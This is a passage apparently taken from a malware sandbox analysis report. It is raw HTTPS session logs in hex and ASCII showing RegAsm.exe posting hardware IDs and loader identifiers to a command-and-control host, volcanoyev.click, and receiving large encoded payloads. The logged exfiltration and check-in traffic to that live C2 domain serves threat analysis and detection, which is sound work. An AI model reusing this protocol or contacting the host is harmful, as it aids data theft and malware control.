                                                          2024-12-24 01:18:24 UTC1369INData Raw: 4d 78 52 58 41 6f 62 4b 6f 67 73 73 45 48 54 66 43 4e 42 73 71 42 56 56 69 70 6b 5a 59 7a 79 4f 68 6a 42 30 78 70 38 6d 4c 7a 38 6c 6c 51 53 53 68 73 35 68 6d 32 77 56 70 6b 30 66 51 44 31 2f 68 49 55 62 57 4d 6f 33 75 35 38 51 35 66 52 56 31 4b 72 6e 75 6e 64 51 68 38 47 61 69 76 4d 59 75 56 44 79 57 73 51 63 4a 6a 2b 56 56 77 75 5a 68 72 61 2f 33 70 4f 68 70 4a 65 4c 49 33 7a 6f 35 70 2f 44 6b 4e 4c 4a 59 67 36 73 45 79 5a 4e 47 35 44 70 2b 74 43 54 32 45 6a 4d 63 75 38 5a 51 36 59 6b 67 59 73 7a 65 43 31 6d 6b 42 63 48 42 74 68 78 6e 6e 78 51 39 64 76 50 46 79 7a 37 30 52 50 61 68 6f 56 34 65 35 39 55 49 4b 51 49 57 47 52 70 65 37 5a 51 68 74 36 5a 51 76 61 63 2b 42 44 6d 30 41 70 51 37 6e 53 62 48 73 38 49 7a 75 4f 32 6e 6c 57 67 70 4a 65 4c 49 33 7a
                                                          Data Ascii: MxRXAobKogssEHTfCNBsqBVVipkZYzyOhjB0xp8mLz8llQSShs5hm2wVpk0fQD1/hIUbWMo3u58Q5fRV1KrnundQh8GaivMYuVDyWsQcJj+VVwuZhra/3pOhpJeLI3zo5p/DkNLJYg6sEyZNG5Dp+tCT2EjMcu8ZQ6YkgYszeC1mkBcHBthxnnxQ9dvPFyz70RPahoV4e59UIKQIWGRpe7ZQht6ZQvac+BDm0ApQ7nSbHs8IzuO2nlWgpJeLI3z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.849717172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:25 UTC279OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=RFHAG1EV9SGJF3P
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 12830
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:25 UTC12830OUTData Raw: 2d 2d 52 46 48 41 47 31 45 56 39 53 47 4a 46 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 46 48 41 47 31 45 56 39 53 47 4a 46 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 46 48 41 47 31 45 56 39 53 47 4a 46 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 52 46 48
                                                          Data Ascii: --RFHAG1EV9SGJF3PContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--RFHAG1EV9SGJF3PContent-Disposition: form-data; name="pid"2--RFHAG1EV9SGJF3PContent-Disposition: form-data; name="lid"VC6Dfm--Loader2--RFH
                                                          2024-12-24 01:18:26 UTC1124INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=tfdvd9l7vmj4lblgclq7kk4g78; expires=Fri, 18 Apr 2025 19:05:05 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1EB7WWsoc0WihQ28MKVzUUod%2FV7T6owo2PzZ5gzqhlIqYuFDmEPNgIthGLIBCwjzKUpklWC4YJre8gl4bUjcw5%2F7azMyQM8b7DYfH9BrBpRgqpXNW8bbmWsEOVFyzIwNQICY"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1e42a438c0f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1805&rtt_var=682&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13767&delivery_rate=1600000&cwnd=220&unsent_bytes=0&cid=26ba71e8a8ed173b&ts=1209&x=0"
                                                          2024-12-24 01:18:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.849718172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:26 UTC263OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:26 UTC1127INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=551kvgj71kqqv65siip36rpgjn; expires=Fri, 18 Apr 2025 19:05:05 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O6r%2BYpEK6RPzQPVxEE0qTpDEnHc%2B8g4UZ%2FHxKiyEugzYchufSxWA%2FhUJtFz70URMc3WgMjz7l3IPYiYFsEvcQZYaHP1hQUhoBLZYp2FL%2BinG4vdWhjp9X%2Fgwc4rGpLSNPe0A"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1e68854431b-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1586&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1795817&cwnd=178&unsent_bytes=0&cid=3742c8f170a34a20&ts=762&x=0"
                                                          2024-12-24 01:18:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.849719172.67.195.2414434352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:28 UTC264OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 49
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:28 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 26 6a 3d
                                                          Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--Loader2&j=
                                                          2024-12-24 01:18:28 UTC1125INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=bmkuk2se7884dqjofftbdfort1; expires=Fri, 18 Apr 2025 19:05:07 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=coVvMQfL3um%2FMMEWy%2FXElxSr7S%2Bv%2BEq%2BOXEsqsjqz4BNpirjizOunCtR2ecg1DoiDsf2T00wuf7w963C1lxDTY5ywbVpfj4sQGdLWjCAm5PWbQinGL9lD5mZhyzALb8MMcHr"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1f2ed577290-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1806&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=949&delivery_rate=1525600&cwnd=249&unsent_bytes=0&cid=7801730e68c71777&ts=770&x=0"
                                                          2024-12-24 01:18:28 UTC244INData Raw: 33 35 33 31 0d 0a 41 67 41 4b 30 38 6c 7a 6e 64 59 58 6b 47 46 30 6f 6d 34 46 6a 62 5a 39 38 30 44 51 2b 6b 4c 53 36 76 51 71 33 67 38 4d 71 36 70 35 49 6e 7a 78 38 30 65 78 39 47 54 31 51 30 37 57 48 48 44 6f 6d 6c 2b 53 4a 50 4c 41 4a 4c 4f 47 68 30 2f 79 4c 58 72 47 69 44 68 6d 61 37 2b 36 46 72 48 30 63 75 68 44 54 76 6b 56 4a 2b 6a 59 58 38 6c 69 74 5a 41 67 73 34 61 57 53 37 56 67 66 4d 66 4a 61 6d 78 74 75 36 77 51 2b 62 64 37 2f 51 51 52 78 77 39 76 34 39 38 51 6d 79 33 79 31 6d 43 33 6b 4e 59 51 2f 45 4a 70 33 38 74 50 59 58 6d 34 36 77 36 78 72 54 58 31 44 31 61 59 54 47 54 6f 31 42 47 56 4a 4c 75 53 4b 72 71 4f 6c 30 36 30 66 32 58 4e 77 6d 70 69 62 72 71 6d 47 65 32 36 63 66 6f 50 46 38 30 50 4a 36 47 55 47 49
                                                          Data Ascii: 3531AgAK08lzndYXkGF0om4FjbZ980DQ+kLS6vQq3g8Mq6p5Inzx80ex9GT1Q07WHHDoml+SJPLAJLOGh0/yLXrGiDhma7+6FrH0cuhDTvkVJ+jYX8litZAgs4aWS7VgfMfJamxtu6wQ+bd7/QQRxw9v498Qmy3y1mC3kNYQ/EJp38tPYXm46w6xrTX1D1aYTGTo1BGVJLuSKrqOl060f2XNwmpibrqmGe26cfoPF80PJ6GUGI
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 6c 69 36 74 68 7a 67 6f 75 48 57 61 6c 67 66 73 2b 49 66 79 78 78 38 61 77 64 76 2b 77 31 2b 67 38 59 78 51 39 6f 36 4e 55 66 67 79 32 79 6d 79 69 34 6a 4a 78 48 73 32 4a 67 77 38 39 6f 61 32 2b 2b 72 42 6e 35 75 33 61 79 54 56 62 48 46 43 65 33 6c 44 2b 42 49 62 47 4d 4c 61 48 49 69 51 61 6c 4c 57 6e 46 69 44 67 69 62 72 2b 71 48 50 2b 6d 66 66 6b 49 45 39 49 48 62 75 4c 5a 48 35 77 6f 76 5a 73 67 74 34 4b 63 52 37 5a 70 59 38 54 4f 59 47 49 6f 2f 2b 73 57 35 2f 51 74 73 69 41 54 30 41 74 72 2b 5a 59 6c 30 54 33 38 67 57 43 33 68 4e 59 51 2f 47 56 72 79 73 74 72 62 57 75 35 6f 41 50 2f 70 6e 50 2f 42 67 54 47 43 57 6e 6c 31 77 32 62 4c 4c 53 62 4b 62 75 42 6b 30 2b 34 4c 53 43 4a 7a 33 67 69 4d 50 47 4b 48 50 53 34 66 2b 55 44 56 74 39 43 66 71 2f 54 45
                                                          Data Ascii: li6thzgouHWalgfs+Ifyxx8awdv+w1+g8YxQ9o6NUfgy2ymyi4jJxHs2Jgw89oa2++rBn5u3ayTVbHFCe3lD+BIbGMLaHIiQalLWnFiDgibr+qHP+mffkIE9IHbuLZH5wovZsgt4KcR7ZpY8TOYGIo/+sW5/QtsiAT0Atr+ZYl0T38gWC3hNYQ/GVrystrbWu5oAP/pnP/BgTGCWnl1w2bLLSbKbuBk0+4LSCJz3giMPGKHPS4f+UDVt9Cfq/TE
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 58 4c 62 7a 49 32 41 69 37 64 53 36 52 69 45 70 68 66 4c 4b 68 55 38 71 33 65 2f 77 45 41 49 41 54 4b 66 61 55 47 4a 31 69 36 74 67 74 73 59 43 51 57 72 4e 67 62 63 66 47 62 32 64 6e 75 61 73 52 38 72 46 78 2b 51 67 56 7a 51 68 31 35 64 51 58 6c 43 4f 34 6b 6d 44 2b 79 4a 46 51 2f 44 55 75 2b 4e 39 72 49 46 32 79 70 52 2f 34 6f 6a 58 74 54 51 2b 41 43 32 75 76 6a 46 2b 63 4b 72 65 64 4c 37 47 43 6d 45 32 32 59 57 62 48 79 33 4a 74 62 4c 47 6e 47 66 57 35 65 2f 59 4c 48 38 73 48 59 65 2f 56 46 64 46 73 38 70 38 34 38 4e 44 57 66 4c 74 68 59 38 61 4b 56 57 46 6d 76 36 77 48 76 36 73 37 36 30 4d 52 7a 45 77 2f 72 39 67 57 6b 53 6d 34 6e 43 43 33 68 5a 4e 4c 75 32 35 6a 7a 73 4a 75 5a 57 79 39 6f 68 7a 35 74 48 4c 32 42 67 54 46 42 57 76 6a 6c 46 48 52 4a 61
                                                          Data Ascii: XLbzI2Ai7dS6RiEphfLKhU8q3e/wEAIATKfaUGJ1i6tgtsYCQWrNgbcfGb2dnuasR8rFx+QgVzQh15dQXlCO4kmD+yJFQ/DUu+N9rIF2ypR/4ojXtTQ+AC2uvjF+cKredL7GCmE22YWbHy3JtbLGnGfW5e/YLH8sHYe/VFdFs8p848NDWfLthY8aKVWFmv6wHv6s760MRzEw/r9gWkSm4nCC3hZNLu25jzsJuZWy9ohz5tHL2BgTFBWvjlFHRJa
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 79 4a 46 45 2f 44 55 75 77 4d 46 79 62 47 61 34 70 68 66 33 73 33 76 2f 43 42 44 4c 43 32 44 70 32 52 65 63 4a 37 47 5a 4a 4c 71 61 6c 55 4f 32 59 47 53 4a 68 69 42 6c 63 50 48 7a 55 64 69 34 58 4f 49 59 42 4e 5a 4d 65 4b 48 4e 58 35 59 75 38 73 42 67 73 34 65 66 52 37 52 6c 59 63 62 4d 62 6d 52 75 76 4b 34 65 39 61 5a 39 2f 41 34 64 7a 77 64 31 37 39 6b 62 6e 53 61 36 6b 79 72 77 78 74 5a 50 70 43 30 32 69 66 31 74 62 57 69 79 76 56 48 67 2b 6d 79 79 42 42 71 41 56 43 66 6a 32 68 2b 65 4c 72 36 54 4b 4c 47 45 6d 45 2b 35 5a 47 62 42 32 6d 46 6d 59 4c 43 6c 48 76 36 77 63 50 63 48 45 63 51 4b 61 4b 2b 61 58 35 59 36 38 73 42 67 6e 36 2b 6a 43 70 31 58 4c 74 61 47 65 53 4a 76 76 65 74 4a 76 37 68 32 2f 67 73 5a 78 67 56 72 35 64 30 55 6e 53 6d 32 6c 43 6d
                                                          Data Ascii: yJFE/DUuwMFybGa4phf3s3v/CBDLC2Dp2RecJ7GZJLqalUO2YGSJhiBlcPHzUdi4XOIYBNZMeKHNX5Yu8sBgs4efR7RlYcbMbmRuvK4e9aZ9/A4dzwd179kbnSa6kyrwxtZPpC02if1tbWiyvVHg+myyBBqAVCfj2h+eLr6TKLGEmE+5ZGbB2mFmYLClHv6wcPcHEcQKaK+aX5Y68sBgn6+jCp1XLtaGeSJvvetJv7h2/gsZxgVr5d0UnSm2lCm
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 62 31 72 66 4d 37 42 63 6d 78 6c 76 71 4d 5a 39 72 56 78 39 77 34 51 7a 41 5a 6d 36 4e 6f 52 6d 57 4c 38 32 43 65 6f 79 4d 34 49 6e 58 31 31 32 39 35 74 51 32 57 2b 36 77 36 78 72 54 58 31 44 31 61 59 54 47 37 39 30 42 4b 44 4b 37 57 57 4c 37 4f 61 6c 30 57 33 66 32 6e 47 7a 47 64 75 62 72 36 74 45 50 71 2b 65 66 55 47 48 63 38 41 4a 36 47 55 47 49 6c 69 36 74 67 4f 75 35 75 42 53 37 4a 6d 65 4e 4b 49 66 79 78 78 38 61 77 64 76 2b 77 31 38 51 67 64 78 41 78 72 37 39 41 53 6b 54 43 39 6e 79 65 35 67 34 52 43 75 32 70 6c 77 63 4e 76 5a 48 71 39 70 51 50 36 70 6d 65 79 54 56 62 48 46 43 65 33 6c 43 6d 57 4d 71 4b 62 59 6f 47 65 6c 56 36 33 59 47 4b 4a 31 79 35 37 4b 4c 61 6e 55 61 66 30 63 2f 30 4b 46 63 38 4e 62 75 50 5a 47 70 67 6e 73 35 34 6b 75 6f 4b 57
                                                          Data Ascii: b1rfM7BcmxlvqMZ9rVx9w4QzAZm6NoRmWL82CeoyM4InX11295tQ2W+6w6xrTX1D1aYTG790BKDK7WWL7Oal0W3f2nGzGdubr6tEPq+efUGHc8AJ6GUGIli6tgOu5uBS7JmeNKIfyxx8awdv+w18QgdxAxr79ASkTC9nye5g4RCu2plwcNvZHq9pQP6pmeyTVbHFCe3lCmWMqKbYoGelV63YGKJ1y57KLanUaf0c/0KFc8NbuPZGpgns54kuoKW
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 47 48 30 53 42 6c 5a 50 48 7a 55 66 79 7a 64 76 4d 4a 48 38 77 44 59 4f 76 47 46 5a 59 77 73 35 6b 72 76 59 53 57 52 62 46 6e 62 38 44 46 62 47 39 76 74 71 51 55 76 2f 6f 31 39 52 74 57 6d 45 78 47 34 74 38 54 79 6e 6a 79 68 32 36 70 79 4a 46 45 2f 44 55 75 79 63 4a 6c 61 47 57 79 70 42 4c 74 74 58 50 67 41 78 76 4b 48 6d 33 6b 30 52 4b 63 4c 37 47 65 4a 72 75 45 68 45 47 38 62 6d 57 4a 68 69 42 6c 63 50 48 7a 55 64 79 6a 59 2f 67 45 47 74 59 48 5a 75 7a 43 45 6f 46 69 2f 4e 67 78 74 35 6e 57 45 4b 70 39 65 63 37 58 4c 6e 73 6f 74 71 64 52 70 2f 52 7a 2b 77 55 52 78 67 4a 31 36 74 49 51 6e 69 75 37 6e 43 69 7a 69 4a 4a 4d 75 32 68 74 78 63 4e 6e 59 57 65 31 6f 68 2f 32 75 7a 57 38 51 78 48 59 54 44 2b 76 39 51 53 53 4c 72 2f 59 50 2f 36 52 31 6b 2b 77 4c
                                                          Data Ascii: GH0SBlZPHzUfyzdvMJH8wDYOvGFZYws5krvYSWRbFnb8DFbG9vtqQUv/o19RtWmExG4t8Tynjyh26pyJFE/DUuycJlaGWypBLttXPgAxvKHm3k0RKcL7GeJruEhEG8bmWJhiBlcPHzUdyjY/gEGtYHZuzCEoFi/Ngxt5nWEKp9ec7XLnsotqdRp/Rz+wURxgJ16tIQniu7nCiziJJMu2htxcNnYWe1oh/2uzW8QxHYTD+v9QSSLr/YP/6R1k+wL
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 34 49 6b 69 36 76 52 54 34 6f 6a 66 48 41 42 6a 4f 43 33 47 76 79 79 44 66 59 72 32 43 59 4f 69 78 6a 77 69 37 59 53 36 52 69 48 56 6c 61 4c 61 78 42 2f 69 34 5a 50 6b 4f 47 75 49 44 59 50 6e 58 45 4a 49 7a 75 39 51 72 76 63 6a 59 43 4c 74 31 4c 70 47 49 54 32 56 2b 73 6f 51 53 37 72 30 31 76 45 4d 52 31 6b 77 2f 72 2b 70 66 67 79 47 69 6d 79 2b 68 74 74 59 51 70 56 4d 75 77 74 35 6e 63 6d 75 6e 6f 42 7a 7a 70 55 75 79 57 30 4b 53 58 6a 57 39 68 67 44 52 50 59 33 57 59 4c 48 49 7a 6e 47 6c 4c 58 69 4a 6b 44 49 73 4b 4b 50 72 53 62 2f 7a 64 75 41 52 45 4d 4d 61 5a 4b 6a 71 49 62 59 30 75 4a 38 77 74 35 2b 5a 43 50 49 74 59 59 6d 51 57 53 4a 68 74 72 41 41 36 62 6c 6c 39 55 4d 70 6a 6b 78 2f 72 34 78 66 70 43 47 38 6c 69 65 6d 6d 64 74 76 71 6d 64 70 32 63
                                                          Data Ascii: 4Iki6vRT4ojfHABjOC3GvyyDfYr2CYOixjwi7YS6RiHVlaLaxB/i4ZPkOGuIDYPnXEJIzu9QrvcjYCLt1LpGIT2V+soQS7r01vEMR1kw/r+pfgyGimy+httYQpVMuwt5ncmunoBzzpUuyW0KSXjW9hgDRPY3WYLHIznGlLXiJkDIsKKPrSb/zduAREMMaZKjqIbY0uJ8wt5+ZCPItYYmQWSJhtrAA6bll9UMpjkx/r4xfpCG8liemmdtvqmdp2c
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 76 75 63 66 39 4c 52 79 34 68 55 4e 6a 41 52 6b 39 63 34 68 72 77 6d 2b 6e 69 65 71 6a 35 42 75 6e 43 30 67 69 63 63 67 4f 6c 48 78 34 31 48 41 2b 6a 58 71 51 30 36 41 4f 57 54 68 32 68 69 48 4d 2f 2b 77 41 34 71 79 31 47 53 37 65 43 7a 39 7a 33 42 7a 59 37 79 6e 55 62 48 30 63 37 4a 62 52 6f 35 4d 59 2f 36 55 52 38 46 77 36 63 31 7a 35 39 6a 45 56 2f 4a 30 4c 74 2b 49 4f 44 41 6d 38 62 6c 52 70 2f 51 79 38 52 45 45 78 67 39 78 37 4a 4d 68 72 77 57 38 6e 79 47 6d 6d 49 46 48 67 6c 4e 37 79 73 5a 75 5a 58 36 67 36 31 2b 2f 75 7a 57 71 4f 6c 61 49 54 46 69 68 6c 41 66 52 65 76 4b 74 49 37 36 47 6b 56 36 74 49 45 6e 48 7a 32 46 30 65 4b 61 6b 55 62 48 30 63 37 4a 62 52 49 35 4d 59 2f 36 55 52 38 46 77 36 63 31 7a 35 39 6a 45 56 2f 4a 30 4c 74 2b 49 4f 44 41
                                                          Data Ascii: vucf9LRy4hUNjARk9c4hrwm+nieqj5BunC0giccgOlHx41HA+jXqQ06AOWTh2hiHM/+wA4qy1GS7eCz9z3BzY7ynUbH0c7JbRo5MY/6UR8Fw6c1z59jEV/J0Lt+IODAm8blRp/Qy8REExg9x7JMhrwW8nyGmmIFHglN7ysZuZX6g61+/uzWqOlaITFihlAfRevKtI76GkV6tIEnHz2F0eKakUbH0c7JbRI5MY/6UR8Fw6c1z59jEV/J0Lt+IODA
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 72 32 55 63 75 51 41 56 6f 35 4d 61 36 2b 4d 58 35 41 6f 6f 70 55 76 74 38 53 52 55 72 73 74 49 49 6e 47 49 44 6f 6f 73 4b 45 42 38 72 74 79 76 67 55 59 7a 6b 78 34 6f 63 31 66 68 32 4c 71 79 32 37 77 6d 74 59 51 2f 43 70 74 32 39 70 6d 59 58 36 79 37 43 2f 42 6d 57 66 31 45 78 57 43 50 57 72 72 77 67 71 53 4d 72 57 6d 48 70 32 61 6b 56 69 2f 4c 31 2f 66 79 32 42 73 62 2f 48 6c 55 65 66 30 4c 62 49 75 42 4d 63 63 5a 4b 2b 61 58 35 31 69 36 74 67 74 6f 6f 2b 47 53 2f 42 71 64 4d 36 49 66 79 78 78 38 62 31 52 70 2b 63 37 73 68 46 57 6d 45 77 67 34 64 6b 65 6b 69 79 78 69 6a 4b 32 69 34 42 4c 2b 31 4e 51 35 4e 70 6e 63 6d 76 7a 6d 68 7a 37 6f 6d 44 78 45 78 48 2b 4d 6b 72 39 30 77 2b 53 59 4a 36 66 4c 62 79 32 71 48 2b 74 61 6e 36 4c 37 6d 4e 30 61 2f 48 6c
                                                          Data Ascii: r2UcuQAVo5Ma6+MX5AoopUvt8SRUrstIInGIDoosKEB8rtyvgUYzkx4oc1fh2Lqy27wmtYQ/Cpt29pmYX6y7C/BmWf1ExWCPWrrwgqSMrWmHp2akVi/L1/fy2Bsb/HlUef0LbIuBMccZK+aX51i6tgtoo+GS/BqdM6Ifyxx8b1Rp+c7shFWmEwg4dkekiyxijK2i4BL+1NQ5Npncmvzmhz7omDxExH+Mkr90w+SYJ6fLby2qH+tan6L7mN0a/Hl


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.849720172.67.195.2414434132C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-24 01:18:28 UTC279OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=QZFPW1XF9RT4L83
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 15059
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:28 UTC15059OUTData Raw: 2d 2d 51 5a 46 50 57 31 58 46 39 52 54 34 4c 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 5a 46 50 57 31 58 46 39 52 54 34 4c 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 5a 46 50 57 31 58 46 39 52 54 34 4c 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 51 5a 46
                                                          Data Ascii: --QZFPW1XF9RT4L83Content-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--QZFPW1XF9RT4L83Content-Disposition: form-data; name="pid"2--QZFPW1XF9RT4L83Content-Disposition: form-data; name="lid"VC6Dfm--Loader2--QZF
                                                          2024-12-24 01:18:29 UTC1134INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=u3f035si7194hv11l62nc2q7f9; expires=Fri, 18 Apr 2025 19:05:07 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vcPWJvCRCyNA19anyapZkb02%2FRmgvLCKZ83eGDtWo%2Fmcd4%2Fj%2BKHc0hXlQtcjZeRlOTdDkyE45Zppi%2Fu7XeB8JMue%2FKQrkTnh8jyDPupampKgo%2FwdLK7R4SOF9xQ20nBOi6G2"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1f39ac0729b-EWR
                                                          alt-svc: h3=":443"; ma=86400
